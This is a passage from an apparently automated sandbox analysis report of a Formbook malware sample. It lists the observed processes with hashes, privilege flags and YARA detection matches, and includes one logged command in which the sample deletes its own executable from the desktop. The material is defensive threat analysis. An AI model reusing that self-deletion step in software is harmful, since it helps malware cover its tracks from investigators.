                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:21:46:47
                                            Start date:13/01/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff6f22f0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:47:01
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                            Imagebase:0x2a0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:21:47:06
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\RRW9901200241.exe'
                                            Imagebase:0x2a0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:47:06
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >